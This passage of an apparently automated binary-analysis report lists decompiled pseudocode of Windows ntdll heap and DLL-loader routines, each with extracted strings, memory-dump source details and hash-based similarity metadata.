                                                                        									if(L014E43C0( &_v68,  &_v24) != 0) {
                                                                        										_t280 =  &(_t280[0]);
                                                                        									}
                                                                        								}
                                                                        								if(_t280 == 0) {
                                                                        									_t280 = 0;
                                                                        									L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                        									_v44 = 0;
                                                                        									_v32 = 0;
                                                                        								} else {
                                                                        									_t280 = 0;
                                                                        								}
                                                                        								_t174 = _v8;
                                                                        								if(_v8 != 0) {
                                                                        									L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                        								}
                                                                        								_v8 = _t280;
                                                                        								goto L46;
                                                                        							}
                                                                        							_t243 = _v48;
                                                                        							do {
                                                                        								 *_t277 = 0;
                                                                        								_t278 = _t277 + 2;
                                                                        								E0151BB40(_t257,  &_v68, _t243);
                                                                        								if(L014E43C0( &_v68,  &_v24) != 0) {
                                                                        									_t280 =  &(_t280[0]);
                                                                        								}
                                                                        								_t243 = _t278;
                                                                        								_t277 = E01521370(_t278, 0x14b4e90);
                                                                        								_pop(_t257);
                                                                        							} while (_t277 != 0);
                                                                        							_v48 = _t243;
                                                                        							_t242 = _v52;
                                                                        							goto L38;
                                                                        						}
                                                                        					}
                                                                        					_t191 = _v12;
                                                                        					_t260 = _v12 + 4;
                                                                        					_v28 = _t260;
                                                                        					if(_t260 == 0) {
                                                                        						_t275 = _t280;
                                                                        						_v16 = _t280;
                                                                        					} else {
                                                                        						_t275 = L014F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                        						_t191 = _v12;
                                                                        						_v16 = _t275;
                                                                        					}
                                                                        					if(_t275 == 0) {
                                                                        						_v28 = _t280;
                                                                        						_t280 = 0xc0000017;
                                                                        						goto L47;
                                                                        					} else {
                                                                        						E0151F3E0(_t275, _v8, _t191);
                                                                        						_t285 = _t285 + 0xc;
                                                                        						_v48 = _t275;
                                                                        						_t279 = _t280;
                                                                        						_t281 = E01521370(_v16, 0x14b4e90);
                                                                        						_pop(_t262);
                                                                        						if(_t281 != 0) {
                                                                        							_t244 = _v48;
                                                                        							do {
                                                                        								 *_t281 = 0;
                                                                        								_t282 = _t281 + 2;
                                                                        								E0151BB40(_t262,  &_v68, _t244);
                                                                        								if(L014E43C0( &_v68,  &_v24) != 0) {
                                                                        									_t279 =  &(_t279[0]);
                                                                        								}
                                                                        								_t244 = _t282;
                                                                        								_t281 = E01521370(_t282, 0x14b4e90);
                                                                        								_pop(_t262);
                                                                        							} while (_t281 != 0);
                                                                        							_v48 = _t244;
                                                                        							_t242 = _v52;
                                                                        						}
                                                                        						_t201 = _v48;
                                                                        						_t280 = 0;
                                                                        						if( *_v48 != 0) {
                                                                        							E0151BB40(_t262,  &_v68, _t201);
                                                                        							if(L014E43C0( &_v68,  &_v24) != 0) {
                                                                        								_t279 =  &(_t279[0]);
                                                                        							}
                                                                        						}
                                                                        						if(_t279 == 0) {
                                                                        							L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                        							_v28 = _t280;
                                                                        							_v16 = _t280;
                                                                        						}
                                                                        						_t202 = _v8;
                                                                        						if(_v8 != 0) {
                                                                        							L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                        						}
                                                                        						_v8 = _t280;
                                                                        						goto L28;
                                                                        					}
                                                                        				}
                                                                        				_t214 = _v12;
                                                                        				_t264 = _v12 + 4;
                                                                        				_v40 = _t264;
                                                                        				if(_t264 == 0) {
                                                                        					_v20 = _t280;
                                                                        				} else {
                                                                        					_t236 = L014F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                        					_t280 = _t236;
                                                                        					_v20 = _t236;
                                                                        					_t214 = _v12;
                                                                        				}
                                                                        				if(_t280 == 0) {
                                                                        					_t161 = 0;
                                                                        					_t280 = 0xc0000017;
                                                                        					_v40 = 0;
                                                                        					goto L48;
                                                                        				} else {
                                                                        					E0151F3E0(_t280, _v8, _t214);
                                                                        					_t285 = _t285 + 0xc;
                                                                        					_v48 = _t280;
                                                                        					_t283 = E01521370(_t280, 0x14b4e90);
                                                                        					_pop(_t267);
                                                                        					if(_t283 != 0) {
                                                                        						_t245 = _v48;
                                                                        						do {
                                                                        							 *_t283 = 0;
                                                                        							_t284 = _t283 + 2;
                                                                        							E0151BB40(_t267,  &_v68, _t245);
                                                                        							if(L014E43C0( &_v68,  &_v24) != 0) {
                                                                        								_t275 = _t275 + 1;
                                                                        							}
                                                                        							_t245 = _t284;
                                                                        							_t283 = E01521370(_t284, 0x14b4e90);
                                                                        							_pop(_t267);
                                                                        						} while (_t283 != 0);
                                                                        						_v48 = _t245;
                                                                        						_t242 = _v52;
                                                                        					}
                                                                        					_t224 = _v48;
                                                                        					_t280 = 0;
                                                                        					if( *_v48 != 0) {
                                                                        						E0151BB40(_t267,  &_v68, _t224);
                                                                        						if(L014E43C0( &_v68,  &_v24) != 0) {
                                                                        							_t275 = _t275 + 1;
                                                                        						}
                                                                        					}
                                                                        					if(_t275 == 0) {
                                                                        						L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                        						_v40 = _t280;
                                                                        						_v20 = _t280;
                                                                        					}
                                                                        					_t225 = _v8;
                                                                        					if(_v8 != 0) {
                                                                        						L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                        					}
                                                                        					_v8 = _t280;
                                                                        					goto L16;
                                                                        				}
                                                                        			}











































                                                                        Strings
                                                                        • Kernel-MUI-Language-Allowed, xrefs: 014E3DC0
                                                                        • WindowsExcludedProcs, xrefs: 014E3D6F
                                                                        • Kernel-MUI-Number-Allowed, xrefs: 014E3D8C
                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 014E3E97
                                                                        • Kernel-MUI-Language-SKU, xrefs: 014E3F70
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                        • API String ID: 0-258546922
                                                                        • Opcode ID: 27e499f83cf2109aaaa30a4b1b427c1fb0384fb2e8c6637b82e456ad6b42b5d1
                                                                        • Instruction ID: 0c42c304431116694bc5482756596a76b8e4d2bb10a98b5f00acd70c4871ddb0
                                                                        • Opcode Fuzzy Hash: 27e499f83cf2109aaaa30a4b1b427c1fb0384fb2e8c6637b82e456ad6b42b5d1
                                                                        • Instruction Fuzzy Hash: 2BF14F72D00619EFCB16DF99C984AEEBBF9FF58650F14016AE505E7221D7349E01CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 29%
                                                                        			E014D40E1(void* __edx) {
                                                                        				void* _t19;
                                                                        				void* _t29;
                                                                        
                                                                        				_t28 = _t19;
                                                                        				_t29 = __edx;
                                                                        				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        						_push("HEAP: ");
                                                                        						E014DB150();
                                                                        					} else {
                                                                        						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        					}
                                                                        					E014DB150("Invalid heap signature for heap at %p", _t28);
                                                                        					if(_t29 != 0) {
                                                                        						E014DB150(", passed to %s", _t29);
                                                                        					}
                                                                        					_push("\n");
                                                                        					E014DB150();
                                                                        					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                        						 *0x15c6378 = 1;
                                                                        						asm("int3");
                                                                        						 *0x15c6378 = 0;
                                                                        					}
                                                                        					return 0;
                                                                        				}
                                                                        				return 1;
                                                                        			}






                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                        • API String ID: 0-188067316
                                                                        • Opcode ID: a757a431bcfec56be7202a96ad281a03868b819c486b2a879751026032e20ab0
                                                                        • Instruction ID: aa58e49c67cce7f8fa7a7edb2450ad8b9c1e02836ab84077117da5ef5e66b738
                                                                        • Opcode Fuzzy Hash: a757a431bcfec56be7202a96ad281a03868b819c486b2a879751026032e20ab0
                                                                        • Instruction Fuzzy Hash: 270128321046529ED6299B7AA46DF9A77F4EB52F70F2BC02FF0084B6A1CAB49440C221
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 69%
                                                                        			E014FA229(void* __ecx, void* __edx) {
                                                                        				signed int _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				void* _v44;
                                                                        				void* _v48;
                                                                        				void* _v56;
                                                                        				void* _v60;
                                                                        				void* __ebx;
                                                                        				signed int _t55;
                                                                        				signed int _t57;
                                                                        				void* _t61;
                                                                        				intOrPtr _t62;
                                                                        				void* _t65;
                                                                        				void* _t71;
                                                                        				signed char* _t74;
                                                                        				intOrPtr _t75;
                                                                        				signed char* _t80;
                                                                        				intOrPtr _t81;
                                                                        				void* _t82;
                                                                        				signed char* _t85;
                                                                        				signed char _t91;
                                                                        				void* _t103;
                                                                        				void* _t105;
                                                                        				void* _t121;
                                                                        				void* _t129;
                                                                        				signed int _t131;
                                                                        				void* _t133;
                                                                        
                                                                        				_t105 = __ecx;
                                                                        				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                                                        				_t103 = __edx;
                                                                        				_t129 = __ecx;
                                                                        				E014FDF24(__edx,  &_v28, _t133);
                                                                        				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                                                        				asm("sbb edi, edi");
                                                                        				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                                                        				if(_t55 != 0) {
                                                                        					_push(0);
                                                                        					_push(0x14);
                                                                        					_push( &_v24);
                                                                        					_push(3);
                                                                        					_push(_t129);
                                                                        					_push(0xffffffff);
                                                                        					_t57 = E01519730();
                                                                        					__eflags = _t57;
                                                                        					if(_t57 < 0) {
                                                                        						L17:
                                                                        						_push(_t105);
                                                                        						E0159A80D(_t129, 1, _v20, 0);
                                                                        						_t121 = 4;
                                                                        						goto L1;
                                                                        					}
                                                                        					__eflags = _v20 & 0x00000060;
                                                                        					if((_v20 & 0x00000060) == 0) {
                                                                        						goto L17;
                                                                        					}
                                                                        					__eflags = _v24 - _t129;
                                                                        					if(_v24 == _t129) {
                                                                        						goto L1;
                                                                        					}
                                                                        					goto L17;
                                                                        				}
                                                                        				L1:
                                                                        				_push(_t121);
                                                                        				_push(0x1000);
                                                                        				_push(_t133 + 0x14);
                                                                        				_push(0);
                                                                        				_push(_t133 + 0x20);
                                                                        				_push(0xffffffff);
                                                                        				_t61 = E01519660();
                                                                        				_t122 = _t61;
                                                                        				if(_t61 < 0) {
                                                                        					_t62 =  *[fs:0x30];
                                                                        					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                                                        					__eflags =  *(_t62 + 0xc);
                                                                        					if( *(_t62 + 0xc) == 0) {
                                                                        						_push("HEAP: ");
                                                                        						E014DB150();
                                                                        					} else {
                                                                        						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        					}
                                                                        					_push( *((intOrPtr*)(_t133 + 0xc)));
                                                                        					_push( *((intOrPtr*)(_t133 + 0x14)));
                                                                        					_push(_t129);
                                                                        					E014DB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                                                        					_t65 = 0;
                                                                        					L13:
                                                                        					return _t65;
                                                                        				}
                                                                        				_t71 = E014F7D50();
                                                                        				_t124 = 0x7ffe0380;
                                                                        				if(_t71 != 0) {
                                                                        					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                        				} else {
                                                                        					_t74 = 0x7ffe0380;
                                                                        				}
                                                                        				if( *_t74 != 0) {
                                                                        					_t75 =  *[fs:0x30];
                                                                        					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                                                        					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                                                        						E0159138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                                                        					}
                                                                        				}
                                                                        				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                                                        				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                                                        				if(E014F7D50() != 0) {
                                                                        					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                        				} else {
                                                                        					_t80 = _t124;
                                                                        				}
                                                                        				if( *_t80 != 0) {
                                                                        					_t81 =  *[fs:0x30];
                                                                        					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                                                        					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                                                        						__eflags = E014F7D50();
                                                                        						if(__eflags != 0) {
                                                                        							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                        							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                        						}
                                                                        						E01591582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                                                        					}
                                                                        				}
                                                                        				_t82 = E014F7D50();
                                                                        				_t125 = 0x7ffe038a;
                                                                        				if(_t82 != 0) {
                                                                        					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                        				} else {
                                                                        					_t85 = 0x7ffe038a;
                                                                        				}
                                                                        				if( *_t85 != 0) {
                                                                        					__eflags = E014F7D50();
                                                                        					if(__eflags != 0) {
                                                                        						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                        						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                        					}
                                                                        					E01591582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                                                        				}
                                                                        				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                                                        				_t91 =  *(_t103 + 2);
                                                                        				if((_t91 & 0x00000004) != 0) {
                                                                        					E0152D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                                                        					_t91 =  *(_t103 + 2);
                                                                        				}
                                                                        				 *(_t103 + 2) = _t91 & 0x00000017;
                                                                        				_t65 = 1;
                                                                        				goto L13;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                        • API String ID: 2994545307-2586055223
                                                                        • Opcode ID: 63a77652ee0296c27b6aaeed3724418541d079b14597b6201feed261b10fac3a
                                                                        • Instruction ID: a0bb276559deb9f44e792970037bcaefd8062befd22e37e1b8345988fb969dbc
                                                                        • Opcode Fuzzy Hash: 63a77652ee0296c27b6aaeed3724418541d079b14597b6201feed261b10fac3a
                                                                        • Instruction Fuzzy Hash: 52510472304A829FD712DB68C884F6B7BE8FB90754F19046DF6958B3A1D734E841C762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 44%
                                                                        			E01508E00(void* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v12;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr* _t32;
                                                                        				intOrPtr _t35;
                                                                        				intOrPtr _t43;
                                                                        				void* _t46;
                                                                        				intOrPtr _t47;
                                                                        				void* _t48;
                                                                        				signed int _t49;
                                                                        				void* _t50;
                                                                        				intOrPtr* _t51;
                                                                        				signed int _t52;
                                                                        				void* _t53;
                                                                        				intOrPtr _t55;
                                                                        
                                                                        				_v8 =  *0x15cd360 ^ _t52;
                                                                        				_t49 = 0;
                                                                        				_t48 = __ecx;
                                                                        				_t55 =  *0x15c8464; // 0x73b80110
                                                                        				if(_t55 == 0) {
                                                                        					L9:
                                                                        					if( !_t49 >= 0) {
                                                                        						if(( *0x15c5780 & 0x00000003) != 0) {
                                                                        							E01555510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                        						}
                                                                        						if(( *0x15c5780 & 0x00000010) != 0) {
                                                                        							asm("int3");
                                                                        						}
                                                                        					}
                                                                        					return E0151B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                        				}
                                                                        				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                        				_t43 =  *0x15c7984; // 0xfa2b20
                                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                        					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                        					if(_t48 == _t43) {
                                                                        						_t50 = 0x5c;
                                                                        						if( *_t32 == _t50) {
                                                                        							_t46 = 0x3f;
                                                                        							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                        								_t32 = _t32 + 8;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_t51 =  *0x15c8464; // 0x73b80110
                                                                        					 *0x15cb1e0(_t47, _t32,  &_v12);
                                                                        					_t49 =  *_t51();
                                                                        					if(_t49 >= 0) {
                                                                        						L8:
                                                                        						_t35 = _v12;
                                                                        						if(_t35 != 0) {
                                                                        							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                        								E01509B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                        								_t35 = _v12;
                                                                        							}
                                                                        							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					if(_t49 != 0xc000008a) {
                                                                        						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                        							if(_t49 != 0xc00000bb) {
                                                                        								goto L8;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					if(( *0x15c5780 & 0x00000005) != 0) {
                                                                        						_push(_t49);
                                                                        						E01555510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                        						_t53 = _t53 + 0x1c;
                                                                        					}
                                                                        					_t49 = 0;
                                                                        					goto L8;
                                                                        				} else {
                                                                        					goto L9;
                                                                        				}
                                                                        			}





















                                                                        Strings
                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0154932A
                                                                        • LdrpFindDllActivationContext, xrefs: 01549331, 0154935D
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0154933B, 01549367
                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 01549357
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 0-3779518884
                                                                        • Opcode ID: 7a8928196f548c39df16cd10e66de6ad049175707b5112763c165bde744349f3
                                                                        • Instruction ID: b29f2e9c6f0e19290b5999d876e0e98f492b2e9c6635eb4a46aefc45e1326c90
                                                                        • Opcode Fuzzy Hash: 7a8928196f548c39df16cd10e66de6ad049175707b5112763c165bde744349f3
                                                                        • Instruction Fuzzy Hash: D1410931E007159FEB37AADC888DF7EBBB4BB44258F06456AD9145F1D2E7706C808791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                        • API String ID: 2994545307-336120773
                                                                        • Opcode ID: 6fc1fe8393705dc8d6bb05afa9b87a135b671df0e9fa3b385560e6351cd0cfed
                                                                        • Instruction ID: 16da6093f1aac3603ccbb1ed2e9c50a938268d9d12e7058203195c496bf09a7c
                                                                        • Opcode Fuzzy Hash: 6fc1fe8393705dc8d6bb05afa9b87a135b671df0e9fa3b385560e6351cd0cfed
                                                                        • Instruction Fuzzy Hash: 74312331100101EFDB20DB6AC988F6B73EAFB05A60F25855EF405CF260D6B8AC41C66A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E014E8794(void* __ecx) {
                                                                        				signed int _v0;
                                                                        				char _v8;
                                                                        				signed int _v12;
                                                                        				void* _v16;
                                                                        				signed int _v20;
                                                                        				intOrPtr _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v40;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr* _t77;
                                                                        				signed int _t80;
                                                                        				signed char _t81;
                                                                        				signed int _t87;
                                                                        				signed int _t91;
                                                                        				void* _t92;
                                                                        				void* _t94;
                                                                        				signed int _t95;
                                                                        				signed int _t103;
                                                                        				signed int _t105;
                                                                        				signed int _t110;
                                                                        				signed int _t118;
                                                                        				intOrPtr* _t121;
                                                                        				intOrPtr _t122;
                                                                        				signed int _t125;
                                                                        				signed int _t129;
                                                                        				signed int _t131;
                                                                        				signed int _t134;
                                                                        				signed int _t136;
                                                                        				signed int _t143;
                                                                        				signed int* _t147;
                                                                        				signed int _t151;
                                                                        				void* _t153;
                                                                        				signed int* _t157;
                                                                        				signed int _t159;
                                                                        				signed int _t161;
                                                                        				signed int _t166;
                                                                        				signed int _t168;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t153 = __ecx;
                                                                        				_t159 = 0;
                                                                        				_t121 = __ecx + 0x3c;
                                                                        				if( *_t121 == 0) {
                                                                        					L2:
                                                                        					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                        					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                        						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                        						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                        						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                        							L6:
                                                                        							if(E014E934A() != 0) {
                                                                        								_t159 = E0155A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                        								__eflags = _t159;
                                                                        								if(_t159 < 0) {
                                                                        									_t81 =  *0x15c5780; // 0x0
                                                                        									__eflags = _t81 & 0x00000003;
                                                                        									if((_t81 & 0x00000003) != 0) {
                                                                        										_push(_t159);
                                                                        										E01555510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                        										_t81 =  *0x15c5780; // 0x0
                                                                        									}
                                                                        									__eflags = _t81 & 0x00000010;
                                                                        									if((_t81 & 0x00000010) != 0) {
                                                                        										asm("int3");
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t159 = E014E849B(0, _t122, _t153, _t159, _t180);
                                                                        							if(_t159 >= 0) {
                                                                        								goto L6;
                                                                        							}
                                                                        						}
                                                                        						_t80 = _t159;
                                                                        						goto L8;
                                                                        					} else {
                                                                        						_t125 = 0x13;
                                                                        						asm("int 0x29");
                                                                        						_push(0);
                                                                        						_push(_t159);
                                                                        						_t161 = _t125;
                                                                        						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                        						_t143 = 0;
                                                                        						_v40 = _t161;
                                                                        						_t118 = 0;
                                                                        						_push(_t153);
                                                                        						__eflags = _t87;
                                                                        						if(_t87 != 0) {
                                                                        							_t118 = _t87 + 0x5d8;
                                                                        							__eflags = _t118;
                                                                        							if(_t118 == 0) {
                                                                        								L46:
                                                                        								_t118 = 0;
                                                                        							} else {
                                                                        								__eflags =  *(_t118 + 0x30);
                                                                        								if( *(_t118 + 0x30) == 0) {
                                                                        									goto L46;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_v32 = 0;
                                                                        						_v28 = 0;
                                                                        						_v16 = 0;
                                                                        						_v20 = 0;
                                                                        						_v12 = 0;
                                                                        						__eflags = _t118;
                                                                        						if(_t118 != 0) {
                                                                        							__eflags = _t161;
                                                                        							if(_t161 != 0) {
                                                                        								__eflags =  *(_t118 + 8);
                                                                        								if( *(_t118 + 8) == 0) {
                                                                        									L22:
                                                                        									_t143 = 1;
                                                                        									__eflags = 1;
                                                                        								} else {
                                                                        									_t19 = _t118 + 0x40; // 0x40
                                                                        									_t156 = _t19;
                                                                        									E014E8999(_t19,  &_v16);
                                                                        									__eflags = _v0;
                                                                        									if(_v0 != 0) {
                                                                        										__eflags = _v0 - 1;
                                                                        										if(_v0 != 1) {
                                                                        											goto L22;
                                                                        										} else {
                                                                        											_t128 =  *(_t161 + 0x64);
                                                                        											__eflags =  *(_t161 + 0x64);
                                                                        											if( *(_t161 + 0x64) == 0) {
                                                                        												goto L22;
                                                                        											} else {
                                                                        												E014E8999(_t128,  &_v12);
                                                                        												_t147 = _v12;
                                                                        												_t91 = 0;
                                                                        												__eflags = 0;
                                                                        												_t129 =  *_t147;
                                                                        												while(1) {
                                                                        													__eflags =  *((intOrPtr*)(0x15c5c60 + _t91 * 8)) - _t129;
                                                                        													if( *((intOrPtr*)(0x15c5c60 + _t91 * 8)) == _t129) {
                                                                        														break;
                                                                        													}
                                                                        													_t91 = _t91 + 1;
                                                                        													__eflags = _t91 - 5;
                                                                        													if(_t91 < 5) {
                                                                        														continue;
                                                                        													} else {
                                                                        														_t131 = 0;
                                                                        														__eflags = 0;
                                                                        													}
                                                                        													L37:
                                                                        													__eflags = _t131;
                                                                        													if(_t131 != 0) {
                                                                        														goto L22;
                                                                        													} else {
                                                                        														__eflags = _v16 - _t147;
                                                                        														if(_v16 != _t147) {
                                                                        															goto L22;
                                                                        														} else {
                                                                        															E014F2280(_t92, 0x15c86cc);
                                                                        															_t94 = E015A9DFB( &_v20);
                                                                        															__eflags = _t94 - 1;
                                                                        															if(_t94 != 1) {
                                                                        															}
                                                                        															asm("movsd");
                                                                        															asm("movsd");
                                                                        															asm("movsd");
                                                                        															asm("movsd");
                                                                        															 *_t118 =  *_t118 + 1;
                                                                        															asm("adc dword [ebx+0x4], 0x0");
                                                                        															_t95 = E015061A0( &_v32);
                                                                        															__eflags = _t95;
                                                                        															if(_t95 != 0) {
                                                                        																__eflags = _v32 | _v28;
                                                                        																if((_v32 | _v28) != 0) {
                                                                        																	_t71 = _t118 + 0x40; // 0x3f
                                                                        																	_t134 = _t71;
                                                                        																	goto L55;
                                                                        																}
                                                                        															}
                                                                        															goto L30;
                                                                        														}
                                                                        													}
                                                                        													goto L56;
                                                                        												}
                                                                        												_t92 = 0x15c5c64 + _t91 * 8;
                                                                        												asm("lock xadd [eax], ecx");
                                                                        												_t131 = (_t129 | 0xffffffff) - 1;
                                                                        												goto L37;
                                                                        											}
                                                                        										}
                                                                        										goto L56;
                                                                        									} else {
                                                                        										_t143 = E014E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                        										__eflags = _t143;
                                                                        										if(_t143 != 0) {
                                                                        											_t157 = _v12;
                                                                        											_t103 = 0;
                                                                        											__eflags = 0;
                                                                        											_t136 =  &(_t157[1]);
                                                                        											 *(_t161 + 0x64) = _t136;
                                                                        											_t151 =  *_t157;
                                                                        											_v20 = _t136;
                                                                        											while(1) {
                                                                        												__eflags =  *((intOrPtr*)(0x15c5c60 + _t103 * 8)) - _t151;
                                                                        												if( *((intOrPtr*)(0x15c5c60 + _t103 * 8)) == _t151) {
                                                                        													break;
                                                                        												}
                                                                        												_t103 = _t103 + 1;
                                                                        												__eflags = _t103 - 5;
                                                                        												if(_t103 < 5) {
                                                                        													continue;
                                                                        												}
                                                                        												L21:
